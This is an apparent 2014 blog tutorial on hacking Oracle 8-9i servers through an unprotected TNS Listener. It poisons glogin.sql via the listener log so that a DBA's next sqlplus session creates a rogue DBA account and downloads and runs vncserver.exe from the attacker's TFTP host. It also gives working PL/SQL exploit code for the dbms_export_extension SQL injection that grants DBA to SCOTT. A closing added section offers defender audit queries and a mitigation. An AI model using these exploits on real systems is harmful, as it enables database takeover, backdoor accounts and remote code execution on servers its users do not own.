
Wednesday, September 3, 2014

Hacking the TNS Listener

Hacking the TNS Listener (Oracle 8-9i Rel.2)

The first step in hacking the TNS Listener is to start the TFTPD from the Backtrack menu. This
step is optional and can be used to upload executables to the database server.

The TFTP server normally runs on port 69 with the home directory /tmp.

Now we copy an executable for the target platform (e.g. vncserver.exe, netcat) into the
directory /tmp.


Now we must get the path of the ORACLE_HOME via the (unprotected) TNS Listener.

The result of the previous command is the ORACLE_HOME (here: c:\oracle\ora92).
The next step is to change the name and directory of the listener log file, e.g. to
c:\oracle\ora92\sqlplus\admin\glogin.sql.
Instead of modifying glogin.sql it is also possible to write content into .rhosts (a
security-aware DBA should NEVER run R*-services on a Unix server) or to upload
authorized keys for SSH. This is not shown here.

Now we write OS commands (download and execute a binary from the TFTP server) and
SQL commands to the listener log file:
tnscmd10g.pl -h 192.168.2.238 -rawcmd "(CONNECT_DATA=((
set term off
create user backtrack20 identified by backtrack20;
grant dba to backtrack20;
host tftp -I 192.168.2.30 GET vncserver.exe vncserver.exe
host vncserver
set term on
Now we change the value of listener.log back to the original value.

The next time the DBA uses sqlplus on the database server, the code in glogin.sql is
executed and vncserver.exe (or netcat) is downloaded and executed.


Now we use VNC to connect to the server. Alternatively we can connect to the database with our
newly created user backtrack20.

GAME OVER –
Server 0wned.
Privilege Escalation
There are various ways to perform a privilege escalation.
dbms_export_extension (Oracle 8i – 10.2.0.2)
One possibility to become DBA is a SQL injection vulnerability in
dbms_export_extension. The following exploit was posted as a 0day on the Bugtraq security
mailing list and has been known since April 2006. The Oracle CPU July 2006 (or a newer patchset
such as 9.2.0.8) fixes this problem.

First we must connect to the database as a user with the CREATE PROCEDURE privilege.
As we can see, we do not have DBA privileges ("desc dba_users").
sqlplus scott/tiger@//192.168.2.238/ora9207



-- Create a function in a package first and inject this function. The function will be
-- executed as user SYS.
CREATE OR REPLACE
PACKAGE BT20_EXPLOIT AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/




CREATE OR REPLACE PACKAGE BODY BT20_EXPLOIT
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN(1);
END;
END;
/



-- Inject the function in dbms_export_extension
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'SCOTT';
TYPE_NAME := 'BT20_EXPLOIT';
TYPE_SCHEMA := 'SCOTT';
VERSION := '10.2.0.2.0';
GMFLAGS := 1;
v_Return :=
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA,
TYPE_NAME => TYPE_NAME, TYPE_SCHEMA => TYPE_SCHEMA,
VERSION => VERSION, NEWBLOCK => NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/


Now we must log out and log in again. After that we are DBA (if the system was not patched
or updated to the latest version).
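As an added defender-side audit (not part of the original post): the following queries, run as a DBA, show who can reach the vulnerable package and surface the artifacts this exploit leaves behind, namely a package in a user schema declaring ODCIIndexGetMetadata and a DBA grant to a non-default account. The schema names in the exclusion lists are assumptions and must be adjusted to the installation.

```sql
-- Added audit queries, not from the original post. Run as a DBA on the database to be checked.

-- 1. Who can execute the vulnerable package? In affected versions PUBLIC holds EXECUTE on
--    DBMS_EXPORT_EXTENSION, which is what lets a low-privileged user such as SCOTT reach it.
SELECT grantee, privilege, grantor
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name = 'DBMS_EXPORT_EXTENSION';

-- 2. Artifact of the injection: a package outside the Oracle-supplied schemas whose source
--    declares ODCIIndexGetMetadata. Real domain-index implementations live in schemas such as
--    CTXSYS and MDSYS (exclusion list is an assumption; extend it with in-house schemas that
--    genuinely implement domain indexes, and review everything else that is returned).
SELECT DISTINCT owner, name, type
  FROM dba_source
 WHERE type IN ('PACKAGE', 'PACKAGE BODY')
   AND UPPER(text) LIKE '%ODCIINDEXGETMETADATA%'
   AND owner NOT IN ('SYS', 'SYSTEM', 'CTXSYS', 'MDSYS', 'ORDSYS', 'XDB');

-- 3. Result of the injection: DBA granted to accounts that should not have it
--    (the exploit above grants DBA to SCOTT; the listener attack creates backtrack20).
SELECT grantee, admin_option
  FROM dba_role_privs
 WHERE granted_role = 'DBA'
   AND grantee NOT IN ('SYS', 'SYSTEM');

-- 4. Version check: CPU July 2006 or the 9.2.0.8 patchset closes the hole.
SELECT banner FROM v$version;

-- 5. Mitigation until the patch is applied: take the package away from PUBLIC. Verify first
--    that the export tooling and any non-DBA jobs that rely on it still work.
REVOKE EXECUTE ON sys.dbms_export_extension FROM PUBLIC;
```

Any row from query 2 or an unexpected grantee from query 3 should be treated as an indicator of compromise rather than a misconfiguration, since neither is created by normal administration.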
